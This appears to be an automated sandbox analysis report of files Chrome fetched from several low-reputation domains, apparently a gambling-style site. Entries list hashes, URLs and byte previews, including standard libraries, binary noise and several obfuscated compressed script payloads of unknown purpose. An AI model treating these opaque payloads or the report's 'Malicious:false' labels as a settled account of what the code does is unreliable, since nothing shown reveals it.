                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1640), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1640
                                                                                                                                                          Entropy (8bit):5.8793664106474886
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V4d378DY42ixzG/iiiks4R/eeLtDjIyi0XmQEkor:VYB4LxN8sCdBi0XmJ5
                                                                                                                                                          MD5:A216B27DFBC17868B3EEB53F92D60F9B
                                                                                                                                                          SHA1:6A180A8321E60E899C76A011DCEDBE853F8DB035
                                                                                                                                                          SHA-256:D2C26A69CA67167F7CEF5218DDBF685F20F3182FAFADC9B6C2150F013997EE1C
                                                                                                                                                          SHA-512:0221A052F6A9196D5138D8EFD28C5270B1BEFBD5147D7DA768AD1D3271AA854366338F616E80233DE426933BCCA4D8E8894F35BC7C1A9B0524A216501480F3A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/indexFooter.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgNgIF0AaAbwGUAmAWxQC4AzAVzRgBcBLdTEUjqTQBKcgCIWSEAAIkHAE5dOYgNwB5MACsQnAHQATEEy5oQABXkoIIeRwCemQWID6zkEgCyKfSwA2IMQoANyhfFhAGAEIABgBfYRUQ+WkUAF40TDEAITVcODFhUmd03QyUQq5UzAyxaK4zAAsCoUzomAgmAsKYVPIYFFoIdBA0DiQGcljSfSgOKGY2Th4M0XkQDhZ5ND79NAAJFDkGLgMjKD8OXQBhdDkoUd0YXYO5UhNDAA8AMRQUDhsGNhiLEprR1g1vONJqQYGtZiB9At2NxeKIktIQKkOA0uEgBKlgO8UMBdJQANIASQAcioargAIKaADmBUyugA9GIANQcLlidnvEAfXSaJAFXTYkaYVjI5aOUQgXQAElMHw4ABUlHBpYsUStyIrBd9fv95FjdEafn8bKQpBquGCUCwODrZajyOjMfoUDAWGCHgBHcLyOyUED+TgoeT03y+NmWk0AUX8/o40gg0maHFSMqWvBAaKgyWziogayCPEkyZAqcoXDAvhMTJUiqg+n0iaCIw4ABlcf9TPJMvRJCBuzZArm9ZhRJc5HZ/I8UL4o6kxABiGBgKAAdmiuDE8VIrfbne7fbkIxsw6dUn8UC7k91ctnunni/6K7NG4AHD+dwAzLgAGHoUlxth2XajBeA7XmII5SOO8hPm6+pzvYH7LquG5bru+6gQIugQWe0H9leQ7wbe4YgA+ASkFOL7kOhC6Kp+2Hrn+gHAaBUxoKkMSkGkkS4G8qRBCgXD6NI0QqAodjkEwUaYOiMCkGazgznwCSRNUVQ9PIpRCi6wjCAYwwJHxMSzpgMC6CEYQFiCMCzDADRaeQQnRKJICxMYaChL48lyeQkRoAAZGFBlrBsWwRVF6ybCsvkmAF8lcEwmDlNiljANIXAglM1AgABwjxGVpAjqMCJInm+ogmpvR
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (858), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):872
                                                                                                                                                          Entropy (8bit):5.164057464392581
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:2o7gXjLMi2A9E7CVtHCSYC6pdzX5PbSuZ1L2A9E7ClVeeoh57n1L2A9E7ClVqanr:2iGjIiouiu6p/PNZ1kdeU71kwrn
                                                                                                                                                          MD5:AC480D48A02AE1E697BD6FBD7D42E8E8
                                                                                                                                                          SHA1:C1E2BF1AB08BEB020AB404FAA5F42CDE77C99AEC
                                                                                                                                                          SHA-256:2F5F4B70CA10C6F21E4EE19BC854A6754AB794AB4F51340A8F1B12444A2B91F8
                                                                                                                                                          SHA-512:EED699DC90295C2D69858F20208DF69CEAD25852724BBFD3B84F51578FC5EEB86F3A5886246099B47849ABB2665CA4A6F373ADB784FE32779FD6FE70FBB7D094
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/jquery/plugins/jquery-eventlock/jquery-eventlock-1.0.0.js?v=1717580749344
                                                                                                                                                          Preview:(function($){$.fn.isLocked=function(){var isLocked=false;if($(this).hasClass("ui-button-disable")){return true}var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){var disabled=$(this).prop("disabled");if(disabled=="true"){isLocked=true}}else{var submited=$(this).prop("submited");if(submited=="true"){isLocked=true}}return isLocked};$.fn.lock=function(){var text={"en-US":"Waiting ...","zh-CN":".....","zh-TW":".....","ja-JP":"......"};$(this).each(function(){var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){$(this).prop("disabled","true")}else{$(this).prop("submited","true")}$(this).addClass("ui-button-disable")})};$.fn.unlock=function(){$(this).each(function(){var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){$(this).prop("disabled",null)}else{$(this).prop("submited",null)}$(this).removeClass("ui-button-disable")})}})(jQuery);
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (316), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316
                                                                                                                                                          Entropy (8bit):5.554163898568294
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:4DAIUaho3oQzSmquAX5mOnL3UHTohigoEIWrybuEqGdbxG94VQf3n:4chWo3bzG5mITUkOem76f3
                                                                                                                                                          MD5:8AC8B467B03D55F87F02D92F257F06D2
                                                                                                                                                          SHA1:D46BD924ACF13BD4ACC616DDB44907388D81217E
                                                                                                                                                          SHA-256:9AEB01913629A4D8017F2D1957E0CE8D9F023C7A05D4B2A859A357C1CDEC82E0
                                                                                                                                                          SHA-512:5B21583F3D6FE93732DDB8224411BC26F23E22E5E8F77D71BBF4127C44125DAD048469E7B520EA9B897C370D6B7A986A31AD40C26159F10C006AAC289C78C066
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/t4045-otherConf-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAJgF0AaAbwAsAnAeQA8AuAMwFc0YAXAS3UxGMuJoAlKQBEzJCAAESdpU4dRAbmpgAViA4A6ACYhGnNCAAKlFBBCV2AT0wDRAfQcgkAWRQ7mAGxCiyANygvZhB6AEIABgBfIUFdO2JRAHMoAFsQADkof04UrnQAMRRKGBAAZXIUYD8WNny0TBFKEHZmSjQpFBi4nQTRGChKHVMUHL1KAFFaGGC9GtYObgamlraO9hilQMpOgF5sUX8dHT9RTi9RkGZREnZ90WAALxuozaA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16228
                                                                                                                                                          Entropy (8bit):5.053983434030325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:g9UztP6/SOOmz6C5ckwgaCPrXfiAbwJuKejbMFo/z95N0Db23//70Lonier:g9UU/fOmzwCTX+er
                                                                                                                                                          MD5:1AD1EE321134B2A6630D60F75DF1F7A2
                                                                                                                                                          SHA1:5E64551B37AD207037A884091FA66EBE8183AC2E
                                                                                                                                                          SHA-256:E93D060958E7643D5005229C5BBA7AD7B4E40E8C912B06609876729871C4E42E
                                                                                                                                                          SHA-512:9C1178DB50353F24E7B551ED98D016AFE15372C7F841BC0C3F268C67E04592372AA6BC55FED7AEE624F25BEF24446A0205ACAEDC8A0964E81B9EA2AC23D4E869
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/wasm_exec.js
                                                                                                                                                          Preview:// Copyright 2018 The Go Authors. All rights reserved..// Use of this source code is governed by a BSD-style.// license that can be found in the LICENSE file..//.// This file has been modified for use by the TinyGo compiler...(() => {..// Map multiple JavaScript environments to a single common API,..// preferring web standards over Node.js API...//..// Environments considered:..// - Browsers..// - Node.js..// - Electron..// - Parcel...if (typeof global !== "undefined") {...// global already exists..} else if (typeof window !== "undefined") {...window.global = window;..} else if (typeof self !== "undefined") {...self.global = self;..} else {...throw new Error("cannot export Go (neither global, window nor self is defined)");..}...if (!global.require && typeof require !== "undefined") {...global.require = require;..}...if (!global.fs && global.require) {...global.fs = require("fs");..}...const enosys = () => {...const err = new Error("not implemented");...err.code = "ENOSYS";...return err
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 131378
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37907
                                                                                                                                                          Entropy (8bit):7.9925501749787555
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:e2dpyKDvQzNFi908Jv01CjXlMaynUlrm+hehpNS6AyAIhYIfyNg4:/dpyKDvQziJv0wjXlMaw+rml0yAI9yR
                                                                                                                                                          MD5:947C3DB7C50F188F554ECB0263023BCE
                                                                                                                                                          SHA1:0ECF9E31CB099B539CAB9492F43A83286F941D5F
                                                                                                                                                          SHA-256:5FD93978CDD4A6013DFEBF96AA6757D74CDC1389F180ED8FC16A138965F94131
                                                                                                                                                          SHA-512:04502911D65E22F789AC24072CE7C81774C17D2794836508FEFBF6ABCD4E875040A4C543C9637B3E16FC6D89FCCCF0D5CDACAE608ACEEB88B77AE6D78A6C7C56
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/jquery/jquery-2.1.1.js?v=1717580749344
                                                                                                                                                          Preview:...........mw.. .}..9.1..$.$..4.qd9...F.M. ...Crd..1.(.....^..{..mg.9.sLa..............;zr..?w..............7..f.I........n....w?b......R1...r........\..w.)^Q..Vx.Z...7..gg..........r>..e....f...j{Sl..W...mW......U...j@6.9....EyY,....js}.31....R.'g.99......`.!...u.v.K..{.X]......z...W...u..:.].w."..du..&.N../>.W.meJ..Q.....w..r;.n...fW.C...u.|.......hY....lV.n"...?...L...\..].../....M..m.G..].........T.1.t..A._..b..9q..)..CJ..r..n...ls4.l..t.?+.......`./g[J...U7..?(...>|wE.../fU..A.....]...Y^.>..iT.fV}w.....f..6...n....*.s.....}..`.yB.&.x&r...(...!)..`.d.p..p.j.C*...l.`..o'....._.}...i...?;..6.......P..:9.6.Yu..b}3.OO............g....,%..l....v[l........0...~....z..x.x...+8.....5...r.$...z{3<../7..GO......%..Eb..\.[_n..........b1..ggc.0..=....CM...f.Ho.....|...m....o..uA..f..4..#(.x)..G< ..&S.kM......}V..o|.......6.....E..,,..ng.f..:..F......p=.P..U.v.a.I.M.).I.l...7..l.^|...dZJ.6rUn..F...gP...CEN.P...(y.`.sC...W..%..$......<..:.w..x
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8744
                                                                                                                                                          Entropy (8bit):5.932552425919391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VFygi0OSf6QzoU31aBkZ/720B21KzMpFEvtlAPNcSebQJhw25dB5Vt:VFygn6QzFgBkh7ZU1VUolcSe07HVl
                                                                                                                                                          MD5:829F0DF1F1036894C109D14213723407
                                                                                                                                                          SHA1:4BD0CECAB8B5CFF27AD12AD2F55961BDC2E67C1F
                                                                                                                                                          SHA-256:BE5099A447276D5C307D9EBB5C22472B55023D58C352D87E3D26DA75681BA0EF
                                                                                                                                                          SHA-512:EB03E1D1E1AF89C1ED54F45FC82C08926CCC59F0FAADB19B951C34AA8E6A3F82C2D52BC8CBCD159FFCABD1126E52C143F8C2596FC23390E442B4B98C1C3BF17B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/news.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2ZyuABZDUKOYeo0wUz0sAPS4Q7FTAHIAmgAepkMsU9kwEExDEFNbSQDiACxDc8sQjXYlmMCYASYESkcxWDiYWI2CpQCARFg0KBcdBIIHkTQ0CJIADmDBgNmeeQoEE8LAgBxAwCQMnYyIUQk4TEwmWAzjsKGArUpSFcpO+5EKOhKNDmnCQXKpAEk0EwULyIGTjIzMNlMiVxfE0NiRUJBTQSuQKjiAMpzDlZbKkI3YgAqnBo8QYIrF0JxdodICtOMo0V8DD41oAwrEoEhqaoXFT5YkkGbgHRHDQKVS6GKaBbSCSFRAAGIh3GqI6qYTGVlodmcyM8vklHL8UXijFY7EBATCdukWMc5PU1i0+S8XVQIr67DEYzO8VV6Wy6GwzB9uQ8FTkPS0Fh6NBaNA2LNkvNQbEldUAMhPNF3GjmwK4HoYO9v8TE6BoIDQ6Z3MBfb8CumHNDtCoMh3P8fEAkAiVUYt8kFNADWtU1zTra13UdSdXVte0n2tH07D9X84wTJgk25VNdAzPdc3zf0S3QpscUwFRRAcL8HGqGgKliGklwUVEBWHLR9XZGAWCA98bBgNckRAABReIxJoboeklCQGmMNcaA3LcL2cFw9GqG0IjodV+BsV8ThoQNv3fAAfGydLQPSbRACzRBgWIUE0HtuLpQFyHQsVEJGTIAEZRGxWgexnFAfIHIciiQYUGyVJkAqQOgUGxZwzxYexHCgOILwAVS4KExUoEM0DgAIGxsDysrQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32034)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):45187
                                                                                                                                                          Entropy (8bit):5.364274258091796
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:oTFZ8CkWyYzh9MTvl7prcAgQW5ppZ+rPPWRqKDyBuq0t:cZiY9uTJuAgQW5LZ+rPPWRLt
                                                                                                                                                          MD5:F15409FB02C527CE1F66A2FD3C4AA0E9
                                                                                                                                                          SHA1:1E1E1BCC0F49E99E14BA34991CFFE0745178D302
                                                                                                                                                          SHA-256:1A1B5D3D6FBFC28ABE37A668ABD59494208C63C5F0B5D040CF4BBBD137F87C27
                                                                                                                                                          SHA-512:66A384D6AD5FBA862E778E24C43326A718328B6F860469FB5EB69C2687B0BBDC3C2DFA9049B0E3D5509214DB1DBEC4477F5C3654DC04446A505379A4300D4908
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/idangerous.swiper.min.js
                                                                                                                                                          Preview:/*. * Swiper 2.7.0. * Mobile touch slider and framework with hardware accelerated transitions. *. * http://www.idangero.us/sliders/swiper/. *. * Copyright 2010-2014, Vladimir Kharlampidi. * The iDangero.us. * http://www.idangero.us/. *. * Licensed under GPL & MIT. *. * Released on: August 30, 2014.*/.var Swiper=function(a,b){"use strict";function c(a,b){return document.querySelectorAll?(b||document).querySelectorAll(a):jQuery(a,b)}function d(a){return"[object Array]"===Object.prototype.toString.apply(a)?!0:!1}function e(){var a=F-I;return b.freeMode&&(a=F-I),b.slidesPerView>C.slides.length&&!b.centeredSlides&&(a=0),0>a&&(a=0),a}function f(){function a(a){var c=new Image;c.onload=function(){"undefined"!=typeof C&&null!==C&&(void 0!==C.imagesLoaded&&C.imagesLoaded++,C.imagesLoaded===C.imagesToLoad.length&&(C.reInit(),b.onImagesReady&&C.fireCallback(b.onImagesReady,C)))},c.src=a||''}var d=C.h.addEventListener,e="wrapper"===b.eventTarget?C.wrapper:C.container;if(C.browser.ie10||C.browser.i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12051
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3316
                                                                                                                                                          Entropy (8bit):7.9446882423582625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:HDAjAUuXSgof7U774DMcxFzOou3cVzXihx:HDARuXfofG7AMcyotGx
                                                                                                                                                          MD5:902AE6C577FFAAD07A9FF299CE0AB884
                                                                                                                                                          SHA1:294C86C2FC8DC7E2AACF10BEF6334E43466819F4
                                                                                                                                                          SHA-256:225EFABD27CE5D8F1E842EFD8C5B987761E56EF00F0DCF0E38C10766D29A7904
                                                                                                                                                          SHA-512:C0CE3989442018160307B28602EB0C76339D286CFE13C7382F1B4B1CF4FBE5F8A2838D0411E4303AAE89E93FAE104BB8E25E5C3D3CA1EA2A4CA06A20B24C9019
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/websocket/CometMarathon.js
                                                                                                                                                          Preview:............mO.G.;.b.:...;.}9.......`PL."k..pkv..u8."9..!..5.\..)m...UB.m~.k.)..y...].i....g.y.g......=....L7.[.Lm.TsQ.C.a..e...S=.==.L.\.]h m...h.d...:O^...x...7.z....]..}...5.c...#..........4.\*.....z.#. ^k../}...^.r$..b...../..6t.h......[k.fK...-1..|D...}.".@.GG..GG.)..).../...t.?.s...r....p).dt.P.<6Q.Z.....EQ.B.a.u.q....ITvks(..h^.1\.... w..R}tm....cU>B.,l..t.TP.F.....k`...s..9.8......i-.......5...U\].......KC$...;(q1:i.SzJ...8....>.\.f_.Af....yG..a6Kz....z....m_.d...j........6..uFb.b..UG..9m.t..so.)]....'../..7`'1..-..3.k.....U..>~.n..S.kSh....ei\..]....;[s.eNZ..Z.p......Le..........T.z}.|D.`...H.<..)..D.?......;j#.i.......a....Z.=.......'k...=.......x~.px...z.*.v.v...G.?8..R......?.".Y0+9..(...y.]..-.2.......o5'o.&.......>.[......-+..?..._hm/.:.Nom~...7.B.......+s9.T.D..t.....U...J...?.pH......)0.....Y...QN..z.F.C.=^....w....m.w........L.O.l....kvtn.Uk.}...J...~z...q.....h...%..........`./..b..v..L.....l.Cn.\...Ev.....b.T
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1126
                                                                                                                                                          Entropy (8bit):5.47861213127639
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oHWLxOCEjMIR46RBobrfjj:Yv1FLJxwewo9E02Lxhg4Tz
                                                                                                                                                          MD5:0FCFC76F2863B3F97A80CCAB1ED7A393
                                                                                                                                                          SHA1:A159FA6509D02078D8DBF5DF092238373F2F4E17
                                                                                                                                                          SHA-256:2B9E4F979B4313A4B840D0E389778160912A4AFE48FBA16C9C6120EEEB05E489
                                                                                                                                                          SHA-512:C227982C96B89AE084B12F636D0E73BB54B41021F5B64A04D917DA1F560E61F47EC6CDBD9BAD4337EA4003B1583AD801EC233B2FEA7297B8E9CBE8DE4E7377AD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t4045","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://wns1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202307/202307200237350.png","snStatus":1,"webTitle":"......","isMaintain":0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):908
                                                                                                                                                          Entropy (8bit):7.682906425679346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:j/69ZxnrheL2Uiu0k8jWw6RiNhEfz3PqOuxP:j/69btImVjEi3M41
                                                                                                                                                          MD5:FB2164CC7B5F4149419E90A1AAEE6060
                                                                                                                                                          SHA1:2594B3D528167108818694E7E22B50F6A5C13B00
                                                                                                                                                          SHA-256:B1535BEE053BDD839A43EB2464FB53929B8DB66794AAB170E297D26C934C6DA1
                                                                                                                                                          SHA-512:B955AAE6B208C458C3ECDB34E3D7BEC170AD9D5669DAE0B3695B0D6C7FFC42BB1EB9FE3575CA0FF91E406BB182D23C7ED379EA0E3119CD77E1D02AEB6823F713
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....pHYs................>IDATX.....U..._.t$N4.`4...h...A.%..1b.... HP.?p.>..*..N0q.E. c.N..nTd....DM...;3]u]....t.=&....~.{...K...K{"LG8...G.2....G...O.GS.H..S........D...x.vE......I.E.5.%.f.-...hkD.!.H.a..&.... *\..s..l.X#...F.Us..+.>..D..h...G..h.-.hy,ZNU4...H.*.)^.JujI.)...~D.t.h.._.......DE.X45*.F./.N..jME.+......O...[....D3S......^.O. ....R.$..\.X.M8.....?..v?.m..]u.y..A.^..X7....c.oV......_.m.....Mu...m...kh..1......I.^.%y.sr....=W..{.6.k...G.....8S;..R|#.{R,?....^.U....:.#...h.c|.~W1.}..*N.m\X!V.=xR.Kq.we..8Y.C..q ...."...jO.}\;.C...|.K.......W.^)...^....,.!.Sg.L..7.\.[..2....>......3.......Q.;.......E..L.....W.=Z.v..CW.;..q{......Q.ga..{..u.....0S..8.....990......l.H}bg.">...u.....u....k.M..Z...........W...W..E.=.bm>...;z|.....C:..~\!6....H....Gg9...z.N.<n.!..w..y...E..|.24X.z.V.x?....z...k.....vq.2..*.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):386
                                                                                                                                                          Entropy (8bit):7.229437500849335
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7m/6TusyTIZvrhmxotSUYeqKXTjyxRqc+vd3B0lN:b/6jNuq/v1B0lN
                                                                                                                                                          MD5:01EDDB92EFA6BDC6C2C753F4135E56CE
                                                                                                                                                          SHA1:6ADBDA924CC353F31765D15BDCEEE5C7E87C5142
                                                                                                                                                          SHA-256:23C1634818EB37B494933F9AE45C57E81547ABF93B5B573365CE4FB278B31EFE
                                                                                                                                                          SHA-512:D047209930F3BAFC5F418C8CE14C60761465DF4F562A76C89C906CDFB374710ED34803A8CE176963E867F4B12861FC4ED7DD1847E76C8ACF7C4A25F9E4201466
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/top/icon_2.png
                                                                                                                                                          Preview:.PNG........IHDR................a....pHYs................4IDAT8...K.Q......K. .._`..!p...I..%.....Ep.P.[Sc...T.......p...y.~..p.?.<..9.A$.E. "~G..Tx.>......]k.....Vr.#,t478.0.N._.W.z...O.A...+v...q..J.6..<....._x.j~^...M...>%.%.R~.W..j3..c..I..Vj.t.S...r....*`9}..C....$....!..3>..)V...7)..Q..b..x.j..2..."...J.......7i...+.6.oY.....gXD4.=.~D.&~..q.... f(......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 1903
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):501
                                                                                                                                                          Entropy (8bit):7.513418222420408
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XdvPEu6ccOA21U0DGEPyxrDHQ/s0Ip+2cYRxcsvEKFYyT0XYn:Xd3Eu6c/A21U0KDHOs0Ip+5x67YyT0In
                                                                                                                                                          MD5:68D894617EF91FDE2FF2DFA274650140
                                                                                                                                                          SHA1:2959FF2B8D0D8C32D15B07034EA5A047064AD350
                                                                                                                                                          SHA-256:D0A797B912D0D784F4B0A99DB6158A1420020214C2C02DD0C854E0DBA7ADB803
                                                                                                                                                          SHA-512:B603BF59F302F6B4D416D27A3EBE16A31AB1973A93EEB57CB4267BE149E0FCC3A330C070DA15D5EB2D6037D9CB700C4D17B3DC8BD5E331A762AC9D22C3060AEA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/default/bootstrap-dialog/bootstrap-dialog.css
                                                                                                                                                          Preview:..............0.._..j...TP.U.Zi^......%ag..w......3W..|...Y.D.y.-.....!......CI6<...i.<. .s...(&!.U=.........k9p.d..J.B.k5.9..F.R.?...g.?e..z..H..7>-;..0.d..l.._my.$.kr...$.aJ..|.....6....B-p...C.Z..>.. _..v.}..'../+.k....;.B.[B.D.....VK._Jz.d..V2!.t..........._D<6P.es.4....J..9.h-.;..f_r.......E........5h........lE.L%."D.v.66.....+"g'3...Nx..,.:*r!...|^|.Z4C.2...L...M.........s*..3I.<.."s1..6.;.^Y.......x..4N.mrK..|.>.^Oa.....aL......yH....blz...'..E;....._...G.y._we..o...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 53 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5512
                                                                                                                                                          Entropy (8bit):7.953358703033644
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:kqL8oKz7AJCdGq/GGfNFANxYPDCsSBbQhMavr6I4M/7HQ+gGovZ0G6ocgcMk+/tO:k+rqOGcgDC3BbMbz7JgGC0ij++1O
                                                                                                                                                          MD5:97FE2F1D6E8B8A0BB8FA30902229B9C5
                                                                                                                                                          SHA1:D055F99410778C969C73F1B83B502C4692A06563
                                                                                                                                                          SHA-256:7B717F40B2C63DCC928CB89BD928E5A888390D26D10E8CB8062EF5E23D2E772A
                                                                                                                                                          SHA-512:2C39DBC245075EC659AF68F179568A640E88DCC3D21C35FB867928FCDE17E138225DD8159B93F6022802067A30263FD05DADB02C2AADD14B440DD3555A943F85
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
